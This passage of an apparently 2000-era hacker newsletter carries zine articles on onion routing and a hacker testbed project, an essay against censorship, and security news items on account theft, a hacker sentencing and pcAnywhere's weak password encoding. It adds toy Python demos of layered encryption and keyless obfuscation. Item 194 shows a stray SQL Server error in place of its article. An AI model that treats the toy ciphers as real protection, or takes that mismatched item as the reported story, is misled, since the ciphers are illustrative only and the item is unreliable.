      since the destination address is plainly readable in the IP header.
      That's where the anonymity portion comes in.  Someone between you and the
      website you're visiting is _not_ able to tell (easily) where you're going,
      or even where you're coming from.  There are two notable systems in
      use/development today (at least what I've initially found).  They are:
      
      Freedom - "Internet Identity Management System"
      http://www.zeroknowledge.com/products/
      
      The Onion Router Project (US Naval Research Lab)
      http://www.onion-router.net/
      
      There are some differences between the two, but I'm not going to analyze
      them.  Now, how does this all work, you ask?  The scheme is built upon
      public-key encryption (of varying strengths) and a 'private' network of
      routers.  Basically, your packet doesn't take the direct route across the
      net like you'd expect it to.  Instead, it is sent to a specialized
      computer which runs the 'onion routing software'.  That 'onion router'
      (OR) hands the packet off to the next designated OR, which continues to
      forward it on, until the last OR designated finally delivers it to the
      true destination.  I don't want to get into the mechanics for establishing
      routes and vendor-specific details like Freedom's Anonymous Mail Proxy,
      but instead I will explain the generic mechanism that allows you to send
      anonymous, private traffic across the internet via onion routing.
      
      A fairly good paper, by Goldschlag, Reed and Syverson, entitled, "Onion
      Routing for Anonymous and Private Internet Connections," does a thorough
      job of explaining this technology:
      
      http://www.onion-router.net/Publications/CACM-1999.pdf
      
      From the paper:
      
        Onion Routing operates by dynamically building anonymous connections
        within a network of real-time Chaum Mixes.  A Mix is a store and forward
        device that accepts a number of fixed-length messages from numerous
        sources, performs cryptographic transformations on the messages, and
        then forwards the messages to the next destination in a random order.
        A single Mix makes tracking of a particular message either by specific
        bit-pattern, size, or ordering with respect to other messages difficult.
        By routing through numerous Mixes in the network, determining who is
        talking to whom becomes even more difficult.  Onion Routing's network of
        core onion-routers (Mixes) is distributed, fault-tolerant, and under
        the control of multiple administrative domains, so no single onion-
        router can bring down the network or compromise a user's privacy, and
        cooperation between compromised onion-routers is thereby confounded.
      
      Freedom's system might be slightly different in implementation, but again,
      I'm ignoring details, and loving every minute of it!  When a specific
      message needs to be sent through the onion-routed network, several layers
      of encryption are placed on the message, along with sufficient information
      to describe the path on a step-by-step basis: each layer is encrypted for
      one onion router on the path and carries only the address of the next
      one.  This way, each onion router along the way uses its own private key
      to strip off the outermost layer of the 'onion', at which point it
      recognizes the next onion router in the route and forwards the
      partially-decrypted message to it; it learns nothing about the hops
      before its predecessor or beyond its successor.  When the enveloped
      message eventually reaches the final onion router, it is decrypted to
      cleartext, and the message is passed to the destination, not too
      differently from if the source host had simply connected in the clear
      over the Internet, except for the fact that it was made virtually
      untraceable for the duration of its trip from end to end.
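      The layered build-and-peel scheme described above, as an added toy
      example (not code from Napalm or from either onion-routing project):
      per-hop keys are shared symmetric secrets and the cipher is a SHA-256
      keystream with an HMAC tag, standing in for the per-hop public-key
      encryption a real onion router uses so that it runs offline with the
      standard library only; the router and destination names are made up.

```python
# Toy onion construction and peeling, illustrating the layered scheme.
# Assumptions (not from the original article): per-hop keys are symmetric
# secrets, the cipher is a SHA-256 keystream plus an HMAC tag (a stand-in
# for real per-hop public-key encryption), and all names are constructed.
import hashlib
import hmac
import json
import os

NONCE_LEN, TAG_LEN = 16, 32


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Derive `length` keystream bytes from key and nonce (toy cipher)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Add one layer: nonce || ciphertext || HMAC tag."""
    nonce = os.urandom(NONCE_LEN)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> bytes:
    """Remove one layer; refuse if the tag does not verify under this key."""
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("layer is not addressed to this router (tag mismatch)")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


def make_keys(routers):
    """Constructed per-hop secrets; stands in for each router's key pair."""
    return {name: os.urandom(32) for name in routers}


def build_onion(route, destination, message, keys):
    """Wrap `message` so each router in `route` learns only its successor.

    Built inside out: the exit router's layer carries the real destination
    and the cleartext; every earlier layer carries only the next hop and
    the still-encrypted remainder.
    """
    layer = json.dumps({"next": destination, "body": message}).encode()
    onion = seal(keys[route[-1]], layer)
    for i in range(len(route) - 2, -1, -1):
        layer = json.dumps({"next": route[i + 1], "body": onion.hex()}).encode()
        onion = seal(keys[route[i]], layer)
    return onion


def peel(router, onion, keys):
    """What one router does: strip its own layer and read the next hop."""
    layer = json.loads(unseal(keys[router], onion))
    return layer["next"], layer["body"]


def relay(entry, onion, keys):
    """Simulate forwarding from the entry router to the exit router.

    Returns each router's view as (router, next hop, onion size seen), the
    destination the exit router delivered to, and the cleartext delivered.
    """
    trace, hop, current = [], entry, onion
    while True:
        nxt, body = peel(hop, current, keys)
        trace.append((hop, nxt, len(current)))
        if nxt not in keys:          # exit router: body is the cleartext
            return trace, nxt, body
        hop, current = nxt, bytes.fromhex(body)


if __name__ == "__main__":
    routers = ["or-a", "or-b", "or-c"]          # constructed router names
    keys = make_keys(routers)
    onion = build_onion(routers, "www.example.test", "GET / HTTP/1.0", keys)
    trace, dest, cleartext = relay("or-a", onion, keys)
    for router, nxt, size in trace:
        print(f"{router} sees only next hop {nxt} ({size}-byte onion)")
    print("exit router delivered to", dest, ":", cleartext)
```

      The onion visibly shrinks at every hop, which is exactly the size-based
      tracking the Mix quotation warns about; real deployments pad to
      fixed-length cells, which this toy omits.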
      
      Feel free to send me questions and commentary on anything I may have
      screwed up (or done well).
      
      kynik@gh0st.net
      
      ***********************************************************************
            *** The gh0st.net Project (Part 1 of 2): Phatal
      ***********************************************************************
      
        Gh0stnet in its simplest and most basic form is a security model.  As a
      security model, gh0stnet's integrity is maintained by the fact that it
      protects access, whether this be access to data or some other resource
      makes no difference.  Complication occurs when we examine gh0stnet's
      purpose.
      
        The theme is not necessarily to provide an ultra-secure network... it's
      simply to provide security.  Whether the provision of security is done
      well or even in a rational manner is up to us as developers.  Further
      complicating this matter is the concept of providing a security challenge
      or novelty to the public.  Are we targeting a specific group of people to
      benefit from gh0stnet?  As far as I'm concerned, no.  While we are all
      obviously aware that gh0stnet's existence specifically caters to a certain
      type of computer user, there's been no real intention to do so.  By virtue
      of not being funded by a corporation or the government and also by the
      virtue of being conceptualized by someone who spends the better part of
      his day immersed in computer security, the compsec underground will
      inevitably be an integral part of gh0stnet.  Hopefully this will be one of
      its greatest assets.
      
        Although the physical establishment of gh0stnet is still in the works, I
      have a feeling that's going to be the easy part.  I'm putting energy into
      gh0stnet with the intention that it will long surpass my interest.  As a
      field of study and a science, computer security is an evolving subject.
      If gh0stnet is to ever provide anything substantial to its public, it will
      have to reflect this.
      
      Development:
        This is the area that gh0stnet should be the most active in.  If there's
      one thing I hate it's purposeless work.  What I hate more than purposeless
      work is being bored.  From my perspective, I would prefer to do more than
      set up a number of boxes to let people hammer into the ground.  It would
      be fun to look at the logs for a while, but ultimately it would become
      boring.
      
        I'm interested in using gh0stnet as a testbed for alternative,
      ingenuitive, and challenging security concepts.  This would provide tons
      of fun for us, something interesting to give to the users besides boxen to
      break into, and more than likely create some very interesting offspring.
      Software or hardware, it's all a matter of what contributions we as
      individual developers have to offer.
      
      Participation:
        This is an area that I tend to give a lot of thought to. As "developers"
      we really do more than just develop.  We maintain and administer gh0stnet.
      This is not a job. Participation is totally interest-based.  I'm not one
      to force people into doing something that they don't want to.  If it
      appears that the role you're taking in this project is not quite what you
      want or what you expect, it's important that you speak up.  I sacrifice a
      lot of my free time for this but I don't necessarily expect others to.
      The project does have a well-defined vision/goal that I may be relatively
      inflexible about, but not unapproachable.  What I will be very wary of is
      the inclusion of other individuals outside of my sphere of influence.
      This is a delicate project from my standpoint, so I'm a little touchy as
      to who deals with it.  To have one person on board who doesn't quite see
      the goal or has some other motives besides the prosperity of gh0stnet
      would have a negative impact on the project.  Stating this here serves no
      other purpose than for you folks to be aware that I want a shiny, happy,
      rosy environment in which I deal with people who I know and trust.  Not
      that I don't like contributions, but network management and planning
      should pretty much be kept between us developers.
      
        The most important part of getting this off the ground will be the
      communication that goes on between all of us.  Hopefully most of the
      communication will be occurring on the gh0st.net box, courtesy of TF.
      Toxy has also been threatening to start a mailing list and that sounds
      kick ass to me.  Natas, kp2, and I live in the same state and hopefully
      we'll all be getting drunk together soon ; ).
      
      <Next issue = Basic network structure && games>
      
      ***********************************************************************
            *** Violence, Censorship, & Our Rights : Blakboot
      ***********************************************************************
      
      [Editor's note: I've taken the liberty to publish this article by Fire
      Storm's founding member in his absence. This article was (and still is)
      available at <http://fire.gh0st.net/vcr.html>. It has not been edited from
      its original form, except for formatting to fit the page, and minor
      spelling corrections.]
      
        To most of the people who will read this, I have no credibility - why
      should you listen to me?  Well, because if you read any farther, I'm sure
      you will find that I'm not writing about anything extreme; these are our
      rights.
      
        Recently, in retaliation to school violence, people are working to
      suppress information pertaining to explosives; keep it out of the hands of
      youngsters.  Although, this movement is not focusing on just that, rather
      make an exception to our rights, and quiet what we don't want people to
      hear.  You see, this country is based on tolerance.  Some may be
      prejudiced, but we as a whole, in this country, don't just go off destroy
      the minority.  We tolerate it, because if one day our rights are
      threatened, we can count on other people to fight with us.  It's about
      power of people, and not everyone can get what they want - so we must be
      tolerant, even if we don't totally agree with it.
      
        The movement is contradicting itself.  People want to educate the masses
      into an objective whole, yet want to shut out information, and take the
      philosophy, "Ignorance is bliss".  We should work towards happiness,
      because anyone can learn to KILL; bombs, guns, knives, etc. are beside
      the point.  People kill because of many reasons, and "now they can" isn't
      it.
      
        The general public is quick to say that bombs, guns, and "outcasts"  are
      the reason for this school violence problem.  Wrong.  Students don't kill
      just because they _can_, it's because, perhaps they're miserable?  Perhaps
      they're implementing the violence many students just think about?  My
      opinion is yes; I'm even tempted to say the majority by far think about
      violence as an outlet.
      
        "Wackos" just don't think about violence; everyone does and sometimes we
      actually do what we plan.  I'm not trying to justify what these people do,
      but I'm saying these aren't just some isolated cases.  Something is wrong.
      I personally think it's new pressures in society today and the school
      environment.  Keep in mind that the basic idea/concept of how school works
      has never changed.  This "concept" isn't education, it's the environment,
      which is stressful and obviously causes violence.  You may say something
      to the effect, "Stress is a natural part of life".  I agree with you, but
      these are CHILDREN we're talking about, and they obviously can't cope.
      
        Back on the subject of unalienable rights. If we make an exception,
      we'll find ourselves taking away our own rights, _one_by_one_.  There is
      NO exception, these are our RIGHTS!  There will always be someone you
      disagree with, but you'd better respect THEIR freedom, if you want them to
      respect YOUR freedom.  Because one day, your thoughts may not fit in with
      the majority.
      
      End points:
      
        People in the United States of America have the right of press; we can
      write about anything and everything.  If you don't like it, leave. See how
      other governments deal with these things, and tell me how much you hate
      liberalism.
      
        Leave and go to a country where you can't say jack, and tell me how much
      you'd like to shut up those boisterous protestants.  This issue isn't
      something new.  Censorship itself is an exception we've made, and it's
      wrong.
      
      ***********************************************************************
            *** Future Issues
      ***********************************************************************
      
                  The gh0st.net Project (Part 2 of 2) : Phatal
      Creating Restricted ("Sandboxed") User Accounts : Fict
      
      ***********************************************************************
            *** Credits
      ***********************************************************************
      
                     Editor:  Kynik <kynik@gh0st.net>
                  Co-editor:  Ajax <ajax@gh0st.net>
      Article Contributions:  Phatal <phatal@gh0st.net>
                              Blakboot <blakboot@discussion.org>
      
      ***********************************************************************
            *** Subscription
      ***********************************************************************
      
      To subscribe to this 'zine:
        email kynik@gh0st.net or napalmzine@hotmail.com with a subject of
        SUBSCRIBE
      To unsubscribe:
        email kynik@gh0st.net or napalmzine@hotmail.com with a subject of
        UNSUBSCRIBE
      
      Submissions, questions, comments, and constructive chaos may also be
      directed to kynik@gh0st.net, napalmzine@hotmail.com or any of
      the contributors
      
      ***********************************************************************
      
      

      @HWA
      

193.0 HNS:Apr 8th:NEW KIND OF SECURITY SCANNER
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ
      Saturday 8 April 2000 on 3:33 AM
      ISS is offering an on-line scanner for Web sites which surveys users'
      hard drives to detect any potentially dangerous programs, such as
      Trojans and viruses, that may have been placed on the machine without
      their knowledge.
      Link: The Register
               ____________________________________________________
      
      http://www.theregister.co.uk/000407-000033.html
      ----------
      
      Posted 07/04/2000 8:17pm by Thomas C. Greene in Washington

      New Web site security scanner will read your HDD

      Internet Security Systems (ISS), is offering an on-line scanner for Web 
      sites which surveys users' hard drives to detect any potentially dangerous 
      programs, such as Trojans and viruses, that may have been placed on the 
      machine without their knowledge. 

      The ISS Online Scanner will automatically test individual computers, 
      identify security weaknesses, and provide users with easy-to-follow 
      instructions for fixing security problems. 

      It looks at the overall configuration of a computer and recommends changes 
      that can help prevent unwanted intruders from reading or changing 
      sensitive personal files or from enabling an attacker to use the computer 
      as a 'zombie' machine to launch more broad-based Internet attacks. 

      "The importance of offering scalable security management solutions to 
      companies that want best-of-breed technology is critical to the success of 
      protecting the Internet economy," ISS Vice President of Enterprise 
      Software Keith Cooley said. 

      "It is imperative that organizations can easily implement the processes 
      and technologies needed to automatically monitor and respond to security 
      risks. As the industry's leading trusted security provider, ISS is 
      strengthening our unique security software platform to ensure safe and 
      uninterrupted e-business for our customers worldwide," he crooned. 

      The ISS application will use Active-X technology to scan a visitor's 
      machine and wipe out any undesirable code. 

      The company acknowledges that use of scanning applications by Web sites 
      could be controversial. But we don't see much of a problem with it. Sites 
      that offer it as a free, voluntary service will do themselves and their 
      customers a favour. 

      Sites foolish enough to require it as a condition of visiting or doing 
      business will find themselves paying a heavy price in gross revenues, as 
      the vast majority of Web surfers are sure to be repelled by it. 'Market 
      forces' should be adequate to keep this a relatively harmless little 
      gimmick. ®
      
      
      @HWA
      
      
      
194.0 HNS:Apr 8th:WAYS TO ATTACK
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ
      Saturday 8 April 2000 on 3:32 AM
      Following recent high-profile Web security breaches, Enstar, an
      e-security firm, hosted a live demonstration in San Antonio Friday to
      show the many ways hackers break into systems.
      Link: CRN
               ____________________________________________________
      
      http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID
      ----------
      
      Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

      [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='. 

      /templates/sql_createarticle.asp, line 24 
      
      Cool. thanks.
      
      
      
      @HWA
      
195.0 HNS:Apr 7th:STOLEN ACCOUNTS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ
      Friday 7 April 2000 on 6:50 PM
      "Malicious hackers" from overseas have been racking up surfing bills
      for unsuspecting SingNet customers by using their Internet accounts,
      The Straits Times has found out.
      Link: The Straits Times
               ____________________________________________________
      
      http://www.straitstimes.asia1.com/singapore/sin20_0407.html
      ----------
      APR 8, 2000

      Overseas hackers using SingNet accounts to surf 

      

      They are racking up bills for customers by using the global-roaming 
      facility. SingNet devises a counter-strategy

      By STEVE DAWSON

      "MALICIOUS hackers" from overseas have been racking up surfing bills for 
      unsuspecting SingNet customers by using their Internet accounts, The 
      Straits Times has found out. 

      The hackers, many of whom have been traced to Thailand, take advantage of 
      a facility called global roaming, provided by SingNet. 

      The facility allows users who travel overseas to call up a service 
      provider there to connect to SingNet, so they save on IDD charges. 

      The number of complaints from customers who said their accounts have been 
      used by other people peaked at around 50 a month in November and December, 
      said SingNet's product development manager, Mr Lee Wan Fei. 

      SingNet, which has a 260,000-customer base, sees the cases as fraud and 
      has referred them to the police. 

      Most cases seem to involve students, who use chatrooms or 
      instant-messaging services regularly. 

      Here, passwords can be captured either through Trojan-horse programs 
      installed on the hard drive via files sent by e-mail, or through lapses 
      in personal security, such as giving your password to other people. 

      Overseas surfers who obtain passwords fraudulently are then able to log on 
      to the Net using an account belonging to a SingNet customer. 

      This unauthorised use raises the customer's bill. SingNet declined to say 
      how much money was involved. 

      Contractually, SingNet's customers are responsible for all usage on their 
      accounts. But Mr Lee said: "On a case-by-case basis, with adequate proof 
      provided by the user, we may consider offsetting part of the bill for 
      them." 

      SingNet has launched a two-pronged counterattack. It will, from Tuesday, 
      allow users to disable the global-roaming service, which, at present, 
      cannot be disabled. 

      Secondly, when SingNet detects use of the global-roaming service on an 
      account, the account-holder will be automatically notified. 

      Mr David Berryman, SingNet's "abuse-master", is working closely with the 
      Criminal Investigation Department on the cases. 

      He said surfers can also play their part by keeping their passwords secure 
      and downloading the free security software available to SingNet 
      subscribers at www.singnet.com.sg/customer/abusetools/ 

      
      @HWA
      
196.0 HNS:Apr 7th:JAILED FOR SIX MONTHS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       

      by BHZ
      Friday 7 April 2000 on 6:48 PM
      Po Yiu-ming, 19, who was among the first three hackers to be convicted
      since computer crime-related laws were enacted in 1994, was jailed for
      six months yesterday.
      Link: SCMP
               ____________________________________________________
      
      http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp
      ----------
      Thursday, April 6, 2000

      Computer hacker jailed for six months

      By ELAINE PAK LI 

      A shy teenager who became a computer hacker to find "satisfaction 
      and achievement" was jailed for six months yesterday. Clerk Po Yiu-ming, 
      19, who was among the first three hackers to be convicted since computer 
      crime-related laws were enacted in 1994, turned to crime because he was a 
      social outcast, a court heard. 

      Restaurant manager Tam Hei-lun, 19, and student Mak King-ming, 18, were 
      both sentenced to a detention centre for similar offences. 

      The trio, who had earlier pleaded guilty to a total of 49 computer 
      crime-related charges, appeared before Eastern Court magistrate Ian Candy 
      yesterday. 

      Po's lawyer, Wong Man-kit, said the clerk suffered asthma and a skin 
      disease, which had isolated him from classmates. 

      Gradually he became an introvert with low self-esteem. 

      "He then became interested in computers and was obsessed . . . He got a 
      sense of achievement and satisfaction from such offences," Mr Wong said. 

      Barrister Thomas Chan, for Tam, suggested a community service order so the 
      restaurant manager could be punished and rehabilitated at the same time. 

      Tse Hon-yuen for Mak, said the student, who was sitting his A-levels, was 
      now "aware of the responsibility of his foolish act". 

      But Mr Candy, who described the three first offenders as "talented and 
      highly intelligent in computer skills", said they had caused "great damage 
      and loss to society and the economy". 

      "Each of you are well aware that the things you do are dishonest and 
      wrong. Your offences have even alarmed legitimate Internet users. 

      "The court must give a clear message that these offences must be given a 
      deterrent sentence. 

      "Even though each of you have clear criminal records, come from good 
      families and are in every other way talented, the only sentence to impose 
      is an immediate custodial term," Mr Candy said. 

      The court has heard Po had illegally obtained 127 login names and 
      passwords, given to Internet users when they subscribe to a service 
      provider for a monthly fee and an hourly rate. 

      The trio got to know each other through the Internet, exchanged the login 
      names and passwords and hacked into a number of user accounts. 

      Mak had also downloaded songs from the Internet and sold them on discs 
      without the publishers' authorisation, the court had heard. 

      Tam wept as he was sentenced while the other two remained expressionless. 

      The trio applied for bail pending appeal and were released on $10,000 
      bail. 

      Detective Senior Inspector Fung Wai-keung of the Computer Crime Bureau, 
      who was in charge of the case, described the sentences as "appropriate." 

      "Illegally obtaining login names and passwords and selling them for profit 
      is just one of many computer related crimes," he said. 

      "The precedent set today is a good example to show to the international 
      community that Hong Kong will never allow such crimes in the information 
      technology field. 

      "We are not going to let such crimes affect the local electronic trade and 
      its reputation," Inspector Fung added. 
      
      
      @HWA
      
197.0 HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Friday 7 April 2000 on 4:27 PM
      PcAnywhere 9.0.0 at its default security setting uses a trivial
      encryption method, so usernames and passwords are not sent directly in
      the clear. Since most users leave the encryption method set to either
      "none" or "PcAnyWhere", their passwords are sent with weak encryption.
      Link: Bugware
               ____________________________________________________
      
      http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342,
      ----------
      
      PcAnywhere weak password encryption
      Posted to BugTraq on 7.4.2000

      PcAnywhere 9.0.0 set to its default security value uses a trivial 
      encryption method so usernames and passwords are not sent directly in 
      the clear. Since most users have the encryption method set to either 
      "none" or "PcAnyWhere", their passwords are sent with weak encryption. 

      A major concern lies in the fact that PcAnywhere can authenticate users 
      based on their NT domain accounts and passwords. When the user logs on, 
      he is prompted for his NT username and password. They are then 
      "encrypted" through the PcAnywhere method and decrypted by the host 
      computer for validation by the NT domain controller. Someone snooping on 
      the traffic between the two stations will unlock both the PcAnywhere and 
      NT account. All that without even having to go through the L0phtCrack 
      process. 

      Version 7.0 is not at risk since no encryption is used at all. Username 
      and password are sent in clear. I haven't tested version 8 yet.

      --- Solution ---

      Symantec says that this was not intended to be real encryption and 
      suggests the use of the Public or Symmetric key option instead. More 
      info can be found at: 
      http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w
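      The post's point is that a reversible transform with no secret in it 
      is not encryption: whoever can read the wire and knows the algorithm 
      gets the NT password back, no cracking required. The following added 
      example is not Symantec's code and does not reproduce the real 
      pcAnywhere wire format, which the post does not describe. It uses a 
      made-up keyless stand-in for the "PcAnywhere" method and a made-up 
      keyed stand-in for the symmetric-key option, and shows what a passive 
      observer recovers from each.

```python
"""Added example for the pcAnywhere post above. `obfuscate` is a made-up
stand-in for the undocumented "PcAnywhere" method and `keyed_encrypt` a
made-up stand-in for the symmetric-key option; neither is Symantec's code."""
import hashlib
import hmac
import os
from typing import Optional


def obfuscate(data: bytes) -> bytes:
    """Hypothetical keyless transform: XOR each byte with a constant and its
    position. There is no secret, so knowing the algorithm is enough to undo it."""
    return bytes(b ^ 0x5A ^ (i & 0xFF) for i, b in enumerate(data))


def deobfuscate(data: bytes) -> bytes:
    return obfuscate(data)  # XOR with the same mask is its own inverse


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode used as a PRF-based stream cipher
    (illustrative; a real deployment would use AES-GCM or similar)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def keyed_encrypt(key: bytes, data: bytes, nonce: Optional[bytes] = None) -> bytes:
    """nonce || (data XOR keystream). Confidential against a sniffer who lacks
    the key; it is not authenticated, so bit-flips would go undetected."""
    nonce = os.urandom(16) if nonce is None else nonce
    return nonce + bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def keyed_decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, body = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(body, keystream(key, nonce, len(body))))


def login_exchange(username: str, password: str, key: Optional[bytes] = None):
    """Simulate the client-to-host credential message the post describes.
    key=None models the default "PcAnywhere" method; a key models the
    symmetric-key option. Returns (what the host recovers, what a sniffer
    recovers using only public knowledge of the scheme)."""
    cred = f"{username}\x00{password}".encode()
    if key is None:
        wire = obfuscate(cred)
        return deobfuscate(wire), deobfuscate(wire)  # host and sniffer do the same
    wire = keyed_encrypt(key, cred)
    return keyed_decrypt(key, wire), wire  # sniffer has no key, sees only ciphertext


if __name__ == "__main__":
    print(login_exchange("DOMAIN\\alice", "Winter2000!"))
    print(login_exchange("DOMAIN\\alice", "Winter2000!", b"pre-shared-secret"))
```

      The sniffer in the first case is just a second copy of the host's 
      decode routine, which is why the advisory says the traffic "unlocks" 
      the NT account outright. The difference in the second case is not the 
      strength of the XOR but the presence of a key the observer does not 
      hold; the check to make when auditing such a product is whether 
      anything secret goes into the transform at all.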

      
      
      @HWA
      
198.0 HNS:Apr 7th:NET PRIVACY TOOLS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ
      Friday 7 April 2000 on 3:46 PM
      Microsoft promised free Internet tools based on emerging privacy
      standards for controlling how much information people using the Web
      reveal.
      Link: CNET
               ____________________________________________________
      
      http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head
      ----------
      
      Microsoft plans free Net privacy tools 

      By The Associated Press, Special to CNET News.com 
      April 7, 2000, 4:50 a.m. PT 

      TORONTO--Microsoft promised free Internet tools based on emerging privacy 
      standards for controlling how much information people using the Web 
      reveal. 

      Coming from the world's largest software company, the tools could give 
      impetus for Web sites and other companies to embrace the Platform for 
      Privacy Preferences, or P3P. The World Wide Web Consortium, an Internet 
      standards group, may finalize P3P this summer. 

       
      Richard Purcell, Microsoft's chief privacy officer, said the tools will 
      help consumers better understand how sites track visits and pass along 
      information to other parties. 

      A formal announcement is expected in a few weeks. Purcell disclosed the 
      company's intent during an interview yesterday at the Computers, Freedom 
      and Privacy conference here, meeting through today. 

      People using the Internet are increasingly concerned about Web sites that 
      create profiles of email addresses, favorite books and clothing sizes for 
      marketing purposes. 

      Sites often disclose their intent in privacy statements that are difficult 
      to find and understand. The Microsoft tools, to be released this fall, 
      will translate such statements into machine-readable form and let Internet 
      surfers block access to sites that collect too much. 

      With the software, people using the Web can state what types of 
      information they are willing to give, as well as whether they mind sharing 
      that information with outside parties. Internet surfers will receive a 
      warning before visiting sites that go beyond that level. 

      Microsoft plans to make the tools for its browser, Internet Explorer, and 
      for the competing Netscape browsers. 

      Lorrie Cranor, who heads a P3P working group, considered Microsoft's 
      decision important, saying, "In order for P3P to be widely used, there 
      has to be good user software available.

      "The question I always get is, 'Is Microsoft going to implement it?'" she 
      said. 

      Still, critics believe Web sites won't have incentives to join, rendering 
      such tools and standards meaningless. Jason Catlett, president of 
      Junkbusters and a critic of P3P, said wide adoption remains years away.

      
      
      @HWA
      
      
      
199.0 HNS:Apr 7th:SECURITY ADDITIONS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ
      Friday 7 April 2000 on 3:45 PM
      Cisco Systems next week plans to ramp up its VPN security with a new
      addition to its PIX firewall line as well as an updated version of its
      Secure Policy Manager software for enterprise users.
      Link: InfoWorld
               ____________________________________________________
      
      http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml
      ----------

      Cisco plans firewall addition for small businesses
      
      By Cathleen Moore 

      CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network) 
      security with a new addition to its PIX firewall line as well as an 
      updated version of its Secure Policy Manager software for enterprise 
      users. 

      The Cisco PIX Firewall 506 will bring a low-end offering aimed at small 
      businesses and branch offices to the company's existing firewall set. 
      Other products in the family include the PIX 515, targeted at small and 
      midsize enterprises, and the Secure PIX 520, which is designed for large 
      enterprise installations.

      With its newest firewall member, Cisco is attempting to tap into small 
      business environments, which -- with increasing reliance on the Internet 
      -- are seeking more powerful security solutions for remote access 
      technologies and VPN. About the size of a hardback, the PIX 506 can handle 
      throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to 
      Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB 
      of RAM, and two integrated Fast Ethernet ports. 

      Version 2.0 of Cisco Secure Policy Manager adds improved scalability and 
      additional support for IPsec VPN configurations in Cisco's routers and 
      firewalls. The Policy Manager lets IT managers define and audit network 
      security policies from a central location, according to the company. The 
      product also can simplify deployment of security services supported by 
      Cisco's firewalls and IOS-based VPN routers, Cisco said.

      The Cisco Secure PIX Firewall 506 will be available in May, priced 
      starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this 
      month, priced at $7,500.

      Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com.
      
      Cathleen Moore is an InfoWorld reporter. 

      
             
      
      @HWA
      
      
      
200.0 HNS:Apr 7th:COOKIES
      ~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 
 
      by BHZ
      Friday 7 April 2000 on 3:43 PM
      You say you don't like browser cookies? You're not quite sure if that
      program you download from the Net is revealing more about you than it
      should? Wired has an article about it and we had a discussion on them
      on our forum.
      Link: Wired on cookies
      Link: HNS forum
               ____________________________________________________
      
      http://www.wired.com/news/politics/0,1283,35498,00.html
      http://default.net-security.org/phorum/read.php3?num
      ----------
      Getting Snooped On? Too Bad 

      By Declan McCullagh 
      3:00 a.m. Apr. 7, 2000 PDT 

      TORONTO -- You say you don't like browser cookies? You're not quite sure 
      if that program you download from the Net is revealing more about you 
      than it should? 

      Well, here's something to make you really nervous: In the United States, 
      it may be illegal to disable software that snoops on you. 

      The folks who came up with this idea turn out to be the large corporations 
      that helped to draft the Digital Millennium Copyright Act (DMCA), which 
      restricts some forms of tampering with copyright protection devices. 

      In some cases, that means you won't be able to turn off any surveillance 
      features it might include, according to participants in a Thursday 
      afternoon panel at the Computers, Freedom and Privacy conference. 

      "Privacy circumvention is possible only under a limited circumstance," 
      said Paul Schwartz of the Brooklyn Law School. 

      As more and more copyrighted material makes its way online, content owners 
      are turning to encryption to protect their works from widespread illicit 
      redistribution. 

      Stephen King distributed his recent novel online in encrypted form, and 
      music companies are backing Secure Digital Memory Card for audio players. 

      Privacy advocates fret that if future works are secure and thus protected 
      under the DMCA, they could reveal consumers' private behavior 
      --RealNetworks' RealJukebox player secretly did just that -- and tinkering 
      with the program to turn off the reporting mechanism would be illegal. 

      "The practical impact is it's another area we're going to be fighting 
      about," Schwartz said. 

      The DMCA, which became law in October 1998, does allow some very limited 
      forms of privacy circumvention. You're allowed to do it if the software 
      leaks "personally identifying information" about you without giving you 
      the ability to say no, and if you're not "in violation of any other law." 

      But here's the rub: Many, if not most, programs include shrink-wrap 
      licenses that prohibit reverse-engineering or altering the program. 

      Some courts have said that shrink-wrap licenses -- software license 
      agreements that don't require a signature -- are binding. If you violate 
      them, would you be able to take advantage of the DMCA's 
